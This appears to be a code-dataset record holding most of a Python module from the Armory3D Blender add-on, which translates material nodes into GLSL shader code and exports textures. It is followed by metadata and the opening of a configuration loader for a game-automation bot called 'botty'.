sample_bump_res = '' else: res = 'n' return res elif node.type == 'MAPPING': out = parse_vector_input(node.inputs[0]) scale = node.inputs['Scale'].default_value rotation = node.inputs['Rotation'].default_value location = node.inputs['Location'].default_value if node.inputs['Location'].enabled else [0.0, 0.0, 0.0] if scale[0] != 1.0 or scale[1] != 1.0 or scale[2] != 1.0: out = '({0} * vec3({1}, {2}, {3}))'.format(out, scale[0], scale[1], scale[2]) if rotation[2] != 0.0: # ZYX rotation, Z axis for now.. 
a = rotation[2] # x * cos(theta) - y * sin(theta) # x * sin(theta) + y * cos(theta) out = 'vec3({0}.x * {1} - ({0}.y) * {2}, {0}.x * {2} + ({0}.y) * {1}, 0.0)'.format(out, math.cos(a), math.sin(a)) # if node.rotation[1] != 0.0: # a = node.rotation[1] # out = 'vec3({0}.x * {1} - {0}.z * {2}, {0}.x * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a)) # if node.rotation[0] != 0.0: # a = node.rotation[0] # out = 'vec3({0}.y * {1} - {0}.z * {2}, {0}.y * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a)) if location[0] != 0.0 or location[1] != 0.0 or location[2] != 0.0: out = '({0} + vec3({1}, {2}, {3}))'.format(out, location[0], location[1], location[2]) # use Extension parameter from the Texture node instead # if node.use_min: # out = 'max({0}, vec3({1}, {2}, {3}))'.format(out, node.min[0], node.min[1]) # if node.use_max: # out = 'min({0}, vec3({1}, {2}, {3}))'.format(out, node.max[0], node.max[1]) return out elif node.type == 'NORMAL': if socket == node.outputs[0]: return to_vec3(node.outputs[0].default_value) elif socket == node.outputs[1]: # TODO: is parse_value path preferred? nor = parse_vector_input(node.inputs[0]) return 'vec3(dot({0}, {1}))'.format(to_vec3(node.outputs[0].default_value), nor) elif node.type == 'NORMAL_MAP': if curshader == tese: return parse_vector_input(node.inputs[1]) else: #space = node.space #map = node.uv_map # Color parse_normal_map_color_input(node.inputs[1], node.inputs[0]) return None elif node.type == 'VECT_TRANSFORM': #type = node.vector_type #conv_from = node.convert_from #conv_to = node.convert_to # Pass throuh return parse_vector_input(node.inputs[0]) elif node.type == 'COMBXYZ': x = parse_value_input(node.inputs[0]) y = parse_value_input(node.inputs[1]) z = parse_value_input(node.inputs[2]) return 'vec3({0}, {1}, {2})'.format(x, y, z) elif node.type == 'VECT_MATH': vec1 = parse_vector_input(node.inputs[0]) vec2 = parse_vector_input(node.inputs[1]) op = node.operation if op == 'ADD': return '({0} + {1})'.format(vec1, vec2) elif op == 'SUBTRACT': return '({0} - {1})'.format(vec1, vec2) elif op == 'AVERAGE': return '(({0} + {1}) / 2.0)'.format(vec1, vec2) elif op == 'DOT_PRODUCT': return 'vec3(dot({0}, {1}))'.format(vec1, vec2) elif op == 'CROSS_PRODUCT': return 'cross({0}, {1})'.format(vec1, vec2) elif op == 'NORMALIZE': return 'normalize({0})'.format(vec1) elif node.type == 'DISPLACEMENT': height = parse_value_input(node.inputs[0]) midlevel = parse_value_input(node.inputs[1]) scale = parse_value_input(node.inputs[2]) nor = parse_vector_input(node.inputs[3]) return '(vec3({0}) * {1})'.format(height, scale) def parse_normal_map_color_input(inp, strength_input=None): global normal_parsed global frag if basecol_only: return if inp.is_linked == False: return if normal_parsed: return normal_parsed = True frag.write_normal += 1 if not get_arm_export_tangents() or mat_get_material().arm_decal: # Compute TBN matrix frag.write('vec3 texn = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp))) frag.write('texn.y = -texn.y;') frag.add_include('std/normals.glsl') frag.write('mat3 TBN = cotangentFrame(n, -vVec, texCoord);') frag.write('n = TBN * normalize(texn);') else: frag.write('vec3 n = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp))) if strength_input != None: strength = parse_value_input(strength_input) if strength != '1.0': frag.write('n.xy *= {0};'.format(strength)) frag.write('n = normalize(TBN * n);') con.add_elem('tang', 'short4norm') frag.write_normal -= 1 def parse_value_input(inp): if inp.is_linked: l = inp.links[0] if 
l.from_node.type == 'REROUTE': return parse_value_input(l.from_node.inputs[0]) res_var = write_result(l) st = l.from_socket.type if st == 'RGB' or st == 'RGBA' or st == 'VECTOR': return '{0}.x'.format(res_var) else: # VALUE return res_var else: if mat_batch() and inp.is_uniform: return to_uniform(inp) else: return to_vec1(inp.default_value) def parse_value(node, socket): global particle_info global sample_bump if node.type == 'GROUP': if node.node_tree.name.startswith('Armory PBR'): # Displacement if socket == node.outputs[1]: return parse_value_input(node.inputs[7]) else: return None else: return parse_group(node, socket) elif node.type == 'GROUP_INPUT': return parse_group_input(node, socket) elif node.type == 'ATTRIBUTE': # Pass time till drivers are implemented if node.attribute_name == 'time': curshader.add_uniform('float time', link='_time') return 'time' else: return '0.0' elif node.type == 'CAMERA': # View Z Depth if socket == node.outputs[1]: curshader.add_include('std/math.glsl') curshader.add_uniform('vec2 cameraProj', link='_cameraPlaneProj') return 'linearize(gl_FragCoord.z, cameraProj)' # View Distance else: curshader.add_uniform('vec3 eye', link='_cameraPosition') return 'distance(eye, wposition)' elif node.type == 'FRESNEL': curshader.add_function(c_functions.str_fresnel) ior = parse_value_input(node.inputs[0]) if node.inputs[1].is_linked: dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1])) else: dotnv = 'dotNV' return 'fresnel({0}, {1})'.format(ior, dotnv) elif node.type == 'NEW_GEOMETRY': if socket == node.outputs[6]: # Backfacing return '(1.0 - float(gl_FrontFacing))' elif socket == node.outputs[7]: # Pointiness return '0.0' elif node.type == 'HAIR_INFO': # Is Strand # Intercept # Thickness return '0.5' elif node.type == 'LAYER_WEIGHT': blend = parse_value_input(node.inputs[0]) if node.inputs[1].is_linked: dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1])) else: dotnv = 'dotNV' if socket == node.outputs[0]: # Fresnel curshader.add_function(c_functions.str_fresnel) return 'fresnel(1.0 / (1.0 - {0}), {1})'.format(blend, dotnv) elif socket == node.outputs[1]: # Facing return '(1.0 - pow({0}, ({1} < 0.5) ? 
2.0 * {1} : 0.5 / (1.0 - {1})))'.format(dotnv, blend) elif node.type == 'LIGHT_PATH': if socket == node.outputs[0]: # Is Camera Ray return '1.0' elif socket == node.outputs[1]: # Is Shadow Ray return '0.0' elif socket == node.outputs[2]: # Is Diffuse Ray return '1.0' elif socket == node.outputs[3]: # Is Glossy Ray return '1.0' elif socket == node.outputs[4]: # Is Singular Ray return '0.0' elif socket == node.outputs[5]: # Is Reflection Ray return '0.0' elif socket == node.outputs[6]: # Is Transmission Ray return '0.0' elif socket == node.outputs[7]: # Ray Length return '0.0' elif socket == node.outputs[8]: # Ray Depth return '0.0' elif socket == node.outputs[9]: # Transparent Depth return '0.0' elif socket == node.outputs[10]: # Transmission Depth return '0.0' elif node.type == 'OBJECT_INFO': if socket == node.outputs[2]: # Object Index curshader.add_uniform('float objectInfoIndex', link='_objectInfoIndex') return 'objectInfoIndex' elif socket == node.outputs[3]: # Material Index curshader.add_uniform('float objectInfoMaterialIndex', link='_objectInfoMaterialIndex') return 'objectInfoMaterialIndex' elif socket == node.outputs[4]: # Random curshader.add_uniform('float objectInfoRandom', link='_objectInfoRandom') return 'objectInfoRandom' elif node.type == 'PARTICLE_INFO': if socket == node.outputs[0]: # Index particle_info['index'] = True return 'p_index' if arm.utils.get_rp().arm_particles == 'On' else '0.0' elif socket == node.outputs[1]: # Age particle_info['age'] = True return 'p_age' if arm.utils.get_rp().arm_particles == 'On' else '0.0' elif socket == node.outputs[2]: # Lifetime particle_info['lifetime'] = True return 'p_lifetime' if arm.utils.get_rp().arm_particles == 'On' else '0.0' elif socket == node.outputs[4]: # Size particle_info['size'] = True return '1.0' elif node.type == 'VALUE': if node.arm_material_param: nn = 'param_' + node_name(node.name) curshader.add_uniform('float {0}'.format(nn), link='{0}'.format(node.name)) return nn else: return to_vec1(node.outputs[0].default_value) elif node.type == 'WIREFRAME': #node.use_pixel_size # size = parse_value_input(node.inputs[0]) return '0.0' elif node.type == 'TEX_BRICK': curshader.add_function(c_functions.str_tex_brick) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[4]) res = 'tex_brick_f({0} * {1})'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_CHECKER': curshader.add_function(c_functions.str_tex_checker) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[3]) res = 'tex_checker_f({0}, {1})'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_GRADIENT': if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' grad = node.gradient_type if grad == 'LINEAR': f = '{0}.x'.format(co) elif grad == 'QUADRATIC': f = '0.0' elif grad == 'EASING': f = '0.0' elif grad == 'DIAGONAL': f = '({0}.x + {0}.y) * 0.5'.format(co) elif grad == 'RADIAL': f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co) elif grad == 'QUADRATIC_SPHERE': f = '0.0' elif grad == 'SPHERICAL': f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co) res = '(clamp({0}, 0.0, 1.0))'.format(f) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_IMAGE': # Already fetched if is_parsed(store_var_name(node)): return '{0}.a'.format(store_var_name(node)) tex_name = 
safesrc(node.name) tex = make_texture(node, tex_name) tex_link = node.name if node.arm_material_param else None if tex != None: curshader.write_textures += 1 res = '{0}.a'.format(texture_store(node, tex, tex_name, tex_link=tex_link)) curshader.write_textures -= 1 return res elif node.image == None: # Empty texture tex = {} tex['name'] = tex_name tex['file'] = '' return '{0}.a'.format(texture_store(node, tex, tex_name, True, tex_link=tex_link)) else: tex_store = store_var_name(node) # Pink color for missing texture curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store)) return '{0}.a'.format(tex_store) elif node.type == 'TEX_MAGIC': curshader.add_function(c_functions.str_tex_magic) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) res = 'tex_magic_f({0} * {1} * 4.0)'.format(co, scale) if sample_bump: write_bump(node, res, 0.1) return res elif node.type == 'TEX_MUSGRAVE': # Fall back to noise curshader.add_function(c_functions.str_tex_musgrave) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) # detail = parse_value_input(node.inputs[2]) # distortion = parse_value_input(node.inputs[3]) res = 'tex_musgrave_f({0} * {1} * 0.5)'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_NOISE': curshader.add_function(c_functions.str_tex_noise) assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png') assets_add_embedded_data('noise256.png') curshader.add_uniform('sampler2D snoise256', link='$noise256.png') if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) # detail = parse_value_input(node.inputs[2]) # distortion = parse_value_input(node.inputs[3]) res = 'tex_noise({0} * {1})'.format(co, scale) if sample_bump: write_bump(node, res, 0.1) return res elif node.type == 'TEX_POINTDENSITY': return '0.0' elif node.type == 'TEX_VORONOI': curshader.add_function(c_functions.str_tex_voronoi) assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png') assets_add_embedded_data('noise256.png') curshader.add_uniform('sampler2D snoise256', link='$noise256.png') if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) if node.coloring == 'INTENSITY': res = 'tex_voronoi({0} * {1}).a'.format(co, scale) else: # CELLS res = 'tex_voronoi({0} * {1}).r'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_WAVE': curshader.add_function(c_functions.str_tex_wave) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) res = 'tex_wave_f({0} * {1})'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'LIGHT_FALLOFF': # Constant, linear, quadratic # Shaders default to quadratic for now return '1.0' elif node.type == 'NORMAL': nor = parse_vector_input(node.inputs[0]) return 'dot({0}, {1})'.format(to_vec3(node.outputs[0].default_value), nor) elif node.type == 'VALTORGB': # ColorRamp return '1.0' elif node.type == 'MATH': val1 = parse_value_input(node.inputs[0]) val2 = parse_value_input(node.inputs[1]) op = node.operation if op == 'ADD': out_val = '({0} + {1})'.format(val1, val2) elif op == 'SUBTRACT': out_val = '({0} - {1})'.format(val1, val2) elif op == 'MULTIPLY': out_val = '({0} * {1})'.format(val1, 
val2) elif op == 'DIVIDE': out_val = '({0} / {1})'.format(val1, val2) elif op == 'POWER': out_val = 'pow({0}, {1})'.format(val1, val2) elif op == 'LOGARITHM': out_val = 'log({0})'.format(val1) elif op == 'SQRT': out_val = 'sqrt({0})'.format(val1) elif op == 'ABSOLUTE': out_val = 'abs({0})'.format(val1) elif op == 'MINIMUM': out_val = 'min({0}, {1})'.format(val1, val2) elif op == 'MAXIMUM': out_val = 'max({0}, {1})'.format(val1, val2) elif op == 'LESS_THAN': out_val = 'float({0} < {1})'.format(val1, val2) elif op == 'GREATER_THAN': out_val = 'float({0} > {1})'.format(val1, val2) elif op == 'ROUND': # out_val = 'round({0})'.format(val1) out_val = 'floor({0} + 0.5)'.format(val1) elif op == 'FLOOR': out_val = 'floor({0})'.format(val1) elif op == 'CEIL': out_val = 'ceil({0})'.format(val1) elif op == 'FRACT': out_val = 'fract({0})'.format(val1) elif op == 'MODULO': # out_val = 'float({0} % {1})'.format(val1, val2) out_val = 'mod({0}, {1})'.format(val1, val2) elif op == 'SINE': out_val = 'sin({0})'.format(val1) elif op == 'COSINE': out_val = 'cos({0})'.format(val1) elif op == 'TANGENT': out_val = 'tan({0})'.format(val1) elif op == 'ARCSINE': out_val = 'asin({0})'.format(val1) elif op == 'ARCCOSINE': out_val = 'acos({0})'.format(val1) elif op == 'ARCTANGENT': out_val = 'atan({0})'.format(val1) elif op == 'ARCTAN2': out_val = 'atan({0}, {1})'.format(val1, val2) if node.use_clamp: return 'clamp({0}, 0.0, 1.0)'.format(out_val) else: return out_val elif node.type == 'RGBTOBW': col = parse_vector_input(node.inputs[0]) return '((({0}.r * 0.3 + {0}.g * 0.59 + {0}.b * 0.11) / 3.0) * 2.5)'.format(col) elif node.type == 'SEPHSV': return '0.0' elif node.type == 'SEPRGB': col = parse_vector_input(node.inputs[0]) if socket == node.outputs[0]: return '{0}.r'.format(col) elif socket == node.outputs[1]: return '{0}.g'.format(col) elif socket == node.outputs[2]: return '{0}.b'.format(col) elif node.type == 'SEPXYZ': vec = parse_vector_input(node.inputs[0]) if socket == node.outputs[0]: return '{0}.x'.format(vec) elif socket == node.outputs[1]: return '{0}.y'.format(vec) elif socket == node.outputs[2]: return '{0}.z'.format(vec) elif node.type == 'VECT_MATH': vec1 = parse_vector_input(node.inputs[0]) vec2 = parse_vector_input(node.inputs[1]) op = node.operation if op == 'DOT_PRODUCT': return 'dot({0}, {1})'.format(vec1, vec2) else: return '0.0' ## def vector_curve(name, fac, points): # Write Ys array ys_var = name + '_ys' curshader.write('float {0}[{1}];'.format(ys_var, len(points))) # TODO: Make const for i in range(0, len(points)): curshader.write('{0}[{1}] = {2};'.format(ys_var, i, points[i].location[1])) # Get index fac_var = name + '_fac' curshader.write('float {0} = {1};'.format(fac_var, fac)) index = '0' for i in range(1, len(points)): index += ' + ({0} > {1} ? 
1 : 0)'.format(fac_var, points[i].location[0]) # Write index index_var = name + '_i' curshader.write('int {0} = {1};'.format(index_var, index)) # Linear # Write Xs array facs_var = name + '_xs' curshader.write('float {0}[{1}];'.format(facs_var, len(points))) # TODO: Make const for i in range(0, len(points)): curshader.write('{0}[{1}] = {2};'.format(facs_var, i, points[i].location[0])) # Map vector return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(ys_var, index_var, fac_var, facs_var) def write_normal(inp): if inp.is_linked and inp.links[0].from_node.type != 'GROUP_INPUT': normal_res = parse_vector_input(inp) if normal_res != None: curshader.write('n = {0};'.format(normal_res)) def is_parsed(s): global parsed return s in parsed def res_var_name(node, socket): return node_name(node.name) + '_' + safesrc(socket.name) + '_res' def write_result(l): global parsed res_var = res_var_name(l.from_node, l.from_socket) # Unparsed node if not is_parsed(res_var): parsed[res_var] = True st = l.from_socket.type if st == 'RGB' or st == 'RGBA' or st == 'VECTOR': res = parse_vector(l.from_node, l.from_socket) if res == None: return None curshader.write('vec3 {0} = {1};'.format(res_var, res)) elif st == 'VALUE': res = parse_value(l.from_node, l.from_socket) if res == None: return None curshader.write('float {0} = {1};'.format(res_var, res)) # Normal map already parsed, return elif l.from_node.type == 'NORMAL_MAP': return None return res_var def glsl_type(t): if t == 'RGB' or t == 'RGBA' or t == 'VECTOR': return 'vec3' else: return 'float' def to_uniform(inp): uname = safesrc(inp.node.name) + safesrc(inp.name) curshader.add_uniform(glsl_type(inp.type) + ' ' + uname) return uname def store_var_name(node): return node_name(node.name) + '_store' def texture_store(node, tex, tex_name, to_linear=False, tex_link=None): global sample_bump global sample_bump_res global parsed tex_store = store_var_name(node) if is_parsed(tex_store): return tex_store parsed[tex_store] = True mat_bind_texture(tex) con.add_elem('tex', 'short2norm') curshader.add_uniform('sampler2D {0}'.format(tex_name), link=tex_link) if node.inputs[0].is_linked: uv_name = parse_vector_input(node.inputs[0]) uv_name = 'vec2({0}.x, 1.0 - {0}.y)'.format(uv_name) else: uv_name = 'texCoord' triplanar = node.projection == 'BOX' if triplanar: curshader.write(f'vec3 texCoordBlend = vec3(0.0); vec2 {uv_name}1 = vec2(0.0); vec2 {uv_name}2 = vec2(0.0);') # Temp curshader.write(f'vec4 {tex_store} = vec4(0.0, 0.0, 0.0, 0.0);') curshader.write(f'if (texCoordBlend.x > 0) {tex_store} += texture({tex_name}, {uv_name}.xy) * texCoordBlend.x;') curshader.write(f'if (texCoordBlend.y > 0) {tex_store} += texture({tex_name}, {uv_name}1.xy) * texCoordBlend.y;') curshader.write(f'if (texCoordBlend.z > 0) {tex_store} += texture({tex_name}, {uv_name}2.xy) * texCoordBlend.z;') else: if mat_texture_grad(): curshader.write('vec4 {0} = textureGrad({1}, {2}.xy, g2.xy, g2.zw);'.format(tex_store, tex_name, uv_name)) else: curshader.write('vec4 {0} = texture({1}, {2}.xy);'.format(tex_store, tex_name, uv_name)) if sample_bump: sample_bump_res = tex_store curshader.write('float {0}_1 = textureOffset({1}, {2}.xy, ivec2(-2, 0)).r;'.format(tex_store, tex_name, uv_name)) curshader.write('float {0}_2 = textureOffset({1}, {2}.xy, ivec2(2, 0)).r;'.format(tex_store, tex_name, uv_name)) curshader.write('float {0}_3 = textureOffset({1}, {2}.xy, ivec2(0, -2)).r;'.format(tex_store, tex_name, uv_name)) curshader.write('float {0}_4 = textureOffset({1}, 
{2}.xy, ivec2(0, 2)).r;'.format(tex_store, tex_name, uv_name)) sample_bump = False if to_linear: curshader.write('{0}.rgb = pow({0}.rgb, vec3(2.2));'.format(tex_store)) return tex_store def write_bump(node, res, scl=0.001): global sample_bump global sample_bump_res sample_bump_res = store_var_name(node) + '_bump' # Testing.. get function parts.. ar = res.split('(', 1) pre = ar[0] + '(' if ',' in ar[1]: ar2 = ar[1].split(',', 1) co = ar2[0] post = ',' + ar2[1] else: co = ar[1][:-1] post = ')' curshader.write('float {0}_1 = {1}{2} + vec3(-{4}, 0.0, 0.0){3};'.format(sample_bump_res, pre, co, post, scl)) curshader.write('float {0}_2 = {1}{2} + vec3({4}, 0.0, {4}){3};'.format(sample_bump_res, pre, co, post, scl)) curshader.write('float {0}_3 = {1}{2} + vec3(0.0, -{4}, 0.0){3};'.format(sample_bump_res, pre, co, post, scl)) curshader.write('float {0}_4 = {1}{2} + vec3(0.0, {4}, -{4}){3};'.format(sample_bump_res, pre, co, post, scl)) sample_bump = False def to_vec1(v): return str(v) def to_vec3(v): return 'vec3({0}, {1}, {2})'.format(v[0], v[1], v[2]) def node_by_type(nodes, ntype): for n in nodes: if n.type == ntype: return n def socket_index(node, socket): for i in range(0, len(node.outputs)): if node.outputs[i] == socket: return i def node_name(s): for p in parents: s = p.name + '_' + s if curshader.write_textures > 0: s += '_texread' s = safesrc(s) if '__' in s: # Consecutive _ are reserved s = s.replace('_', '_x') return s ## def make_texture(image_node, tex_name, matname=None): tex = {} tex['name'] = tex_name image = image_node.image if matname is None: matname = mat_state.material.name if image is None: return None # Get filepath filepath = image.filepath if filepath == '': if image.packed_file is not None: filepath = './' + image.name has_ext = filepath.endswith(('.jpg', '.png', '.hdr')) if not has_ext: # Raw bytes, write converted .jpg to /unpacked filepath += '.raw' elif image.source == "GENERATED": unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked') if not os.path.exists(unpack_path): os.makedirs(unpack_path) filepath = os.path.join(unpack_path, image.name + ".jpg") arm.utils.convert_image(image, filepath, "JPEG") else: arm.log.warn(matname + '/' + image.name + ' - invalid file path') return None # Reference image name texpath = arm.utils.asset_path(filepath) texfile = arm.utils.extract_filename(filepath) tex['file'] = arm.utils.safestr(texfile) s = tex['file'].rsplit('.', 1) if len(s) == 1: arm.log.warn(matname + '/' + image.name + ' - file extension required for image name') return None ext = s[1].lower() do_convert = ext not in ('jpg', 'png', 'hdr', 'mp4') # Convert image if do_convert: new_ext = 'png' if (ext in ('tga', 'dds')) else 'jpg' tex['file'] = tex['file'].rsplit('.', 1)[0] + '.' 
+ new_ext if image.packed_file is not None or not is_ascii(texfile): # Extract packed data / copy non-ascii texture unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked') if not os.path.exists(unpack_path): os.makedirs(unpack_path) unpack_filepath = os.path.join(unpack_path, tex['file']) if do_convert: if not os.path.isfile(unpack_filepath): fmt = 'PNG' if new_ext == 'png' else 'JPEG' arm.utils.convert_image(image, unpack_filepath, file_format=fmt) else: # Write bytes if size is different or file does not exist yet if image.packed_file is not None: if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != image.packed_file.size: with open(unpack_filepath, 'wb') as f: f.write(image.packed_file.data) # Copy non-ascii texture else: if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != os.path.getsize(texpath): shutil.copy(texpath, unpack_filepath) arm.assets.add(unpack_filepath) else: if not os.path.isfile(arm.utils.asset_path(filepath)): arm.log.warn('Material ' + matname + '/' + image.name + ' - file not found(' + filepath + ')') return None if do_convert: unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked') if not os.path.exists(unpack_path): os.makedirs(unpack_path) converted_path = os.path.join(unpack_path, tex['file']) # TODO: delete cache when file changes if not os.path.isfile(converted_path): fmt = 'PNG' if new_ext == 'png' else 'JPEG' arm.utils.convert_image(image, converted_path, file_format=fmt) arm.assets.add(converted_path) else: # Link image path to assets # TODO: Khamake converts .PNG to .jpg? Convert ext to lowercase on windows if arm.utils.get_os() == 'win': s = filepath.rsplit('.', 1) arm.assets.add(arm.utils.asset_path(s[0] + '.' 
+ s[1].lower())) else: arm.assets.add(arm.utils.asset_path(filepath)) # if image_format != 'RGBA32': # tex['format'] = image_format interpolation = image_node.interpolation rpdat = arm.utils.get_rp() texfilter = rpdat.arm_texture_filter if texfilter == 'Anisotropic': interpolation = 'Smart' elif texfilter == 'Linear': interpolation = 'Linear' elif texfilter == 'Point': interpolation = 'Closest' # TODO: Blender seems to load full images on size request, cache size instead powimage = is_pow(image.size[0]) and is_pow(image.size[1]) if interpolation == 'Cubic': # Mipmap linear tex['mipmap_filter'] = 'linear' tex['generate_mipmaps'] = True elif interpolation == 'Smart': # Mipmap anisotropic tex['min_filter'] = 'anisotropic' tex['mipmap_filter'] = 'linear' tex['generate_mipmaps'] = True elif interpolation == 'Closest': tex['min_filter'] = 'point' tex['mag_filter'] = 'point' # else defaults to linear if image_node.extension != 'REPEAT': # Extend or clip tex['u_addressing'] = 'clamp' tex['v_addressing'] = 'clamp' if image.source == 'MOVIE': tex['source'] = 'movie' tex['min_filter'] = 'linear' tex['mag_filter'] = 'linear' tex['mipmap_filter'] = 'no' tex['generate_mipmaps'] = False return tex def is_pow(num): return ((num & (num - 1)) == 0) and num != 0 def is_ascii(s): return len(s) == len(s.encode()) ## def get_rp_renderer(): return arm.utils.get_rp().rp_renderer def get_arm_export_tangents(): return bpy.data.worlds['Arm'].arm_export_tangents def safesrc(name): return arm.utils.safesrc(name) def get_sdk_path(): return arm.utils.get_sdk_path() def disp_enabled(): return arm.utils.disp_enabled(arm.make_state.target) def warn(text): arm.log.warn(text) def assets_add(path): arm.assets.add(path) def assets_add_embedded_data(path): arm.assets.add_embedded_data(path) def mat_name(): return mat_state.material.name def mat_batch(): return mat_state.batch def mat_bind_texture(tex): mat_state.bind_textures.append(tex) def mat_texture_grad(): return mat_state.texture_grad def mat_get_material(): return mat_state.material def mat_get_material_users(): return mat_state.mat_users
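# A minimal sketch of the pattern the parser above uses: walk the node graph
# from the output node, translate every node into a GLSL expression string,
# and memoize results (see write_result() and the 'parsed' dict) so a node
# shared by several links is emitted exactly once. The _SketchNode class and
# _sketch_emit() below are hypothetical stand-ins for Blender's bpy node
# types, not Armory's actual API.

class _SketchNode:
    def __init__(self, name, ntype, inputs=None, value=None):
        self.name = name
        self.type = ntype
        self.inputs = inputs or []  # linked upstream nodes
        self.value = value

_sketch_parsed = {}  # mirrors the 'parsed' cache above
_sketch_lines = []   # mirrors curshader.write()

def _sketch_emit(node):
    # Return a GLSL expression for 'node', writing each node only once
    res_var = node.name + '_res'
    if res_var in _sketch_parsed:
        return res_var
    _sketch_parsed[res_var] = True
    if node.type == 'VALUE':
        expr = str(node.value)
    elif node.type == 'ADD':
        expr = '({0} + {1})'.format(_sketch_emit(node.inputs[0]),
                                    _sketch_emit(node.inputs[1]))
    else:
        expr = '0.0'
    _sketch_lines.append('float {0} = {1};'.format(res_var, expr))
    return res_var

if __name__ == '__main__':
    # 'v0' feeds both inputs of 'sum', but is written a single time
    _v0 = _SketchNode('v0', 'VALUE', value=0.25)
    _sketch_emit(_SketchNode('sum', 'ADD', inputs=[_v0, _v0]))
    print('\n'.join(_sketch_lines))
    # float v0_res = 0.25;
    # float sum_res = (v0_res + v0_res);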
39.207601
185
0.567568
0
0
0
0
0
0
0
0
16,641
0.240745
4c4ffee559cb6b71ce9c01f453a956254f1cdb8a
9,981
py
Python
src/config.py
Jizanator/botty
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
[ "MIT" ]
null
null
null
src/config.py
Jizanator/botty
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
[ "MIT" ]
null
null
null
src/config.py
Jizanator/botty
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
[ "MIT" ]
null
null
null
import configparser import numpy as np import os class Config: def _select_val(self, section: str, key: str = None): if section in self._custom and key in self._custom[section]: return self._custom[section][key] elif section in self._config: return self._config[section][key] elif section in self._pickit_config: return self._pickit_config[section][key] elif section in self._shop_config: return self._shop_config[section][key] else: return self._game_config[section][key] def __init__(self, print_warnings: bool = False): # print_warnings, what a hack... here it is, not making the effort # passing a single config instance through bites me in the ass self._print_warnings = print_warnings self._config = configparser.ConfigParser() self._config.read('config/params.ini') self._game_config = configparser.ConfigParser() self._game_config.read('config/game.ini') self._pickit_config = configparser.ConfigParser() self._pickit_config.read('config/pickit.ini') self._shop_config = configparser.ConfigParser() self._shop_config.read('config/shop.ini') self._custom = configparser.ConfigParser() if os.environ.get('RUN_ENV') != "test" and os.path.exists('config/custom.ini'): self._custom.read('config/custom.ini') self.general = { "saved_games_folder": self._select_val("general", "saved_games_folder"), "name": self._select_val("general", "name"), "monitor": int(self._select_val("general", "monitor")), "max_game_length_s": float(self._select_val("general", "max_game_length_s")), "exit_key": self._select_val("general", "exit_key"), "resume_key": self._select_val("general", "resume_key"), "auto_settings_key": self._select_val("general", "auto_settings_key"), "graphic_debugger_key": self._select_val("general", "graphic_debugger_key"), "logg_lvl": self._select_val("general", "logg_lvl"), "randomize_runs": bool(int(self._select_val("general", "randomize_runs"))), "difficulty": self._select_val("general", "difficulty"), "custom_message_hook": self._select_val("general", "custom_message_hook"), "discord_status_count": False if not self._select_val("general", "discord_status_count") else int(self._select_val("general", "discord_status_count")), "info_screenshots": bool(int(self._select_val("general", "info_screenshots"))), "loot_screenshots": bool(int(self._select_val("general", "loot_screenshots"))), } # Added for dclone ip hunting self.dclone = { "region_ips": self._select_val("dclone", "region_ips"), "dclone_hotip": self._select_val("dclone", "dclone_hotip"), } self.routes = {} for key in self._config["routes"]: self.routes[key] = bool(int(self._select_val("routes", key))) self.char = { "type": self._select_val("char", "type"), "show_items": self._select_val("char", "show_items"), "inventory_screen": self._select_val("char", "inventory_screen"), "stand_still": self._select_val("char", "stand_still"), "force_move": self._select_val("char", "force_move"), "num_loot_columns": int(self._select_val("char", "num_loot_columns")), "take_health_potion": float(self._select_val("char", "take_health_potion")), "take_mana_potion": float(self._select_val("char", "take_mana_potion")), "take_rejuv_potion_health": float(self._select_val("char", "take_rejuv_potion_health")), "take_rejuv_potion_mana": float(self._select_val("char", "take_rejuv_potion_mana")), "heal_merc": float(self._select_val("char", "heal_merc")), "heal_rejuv_merc": float(self._select_val("char", "heal_rejuv_merc")), "chicken": float(self._select_val("char", "chicken")), "merc_chicken": float(self._select_val("char", "merc_chicken")), "tp": self._select_val("char", 
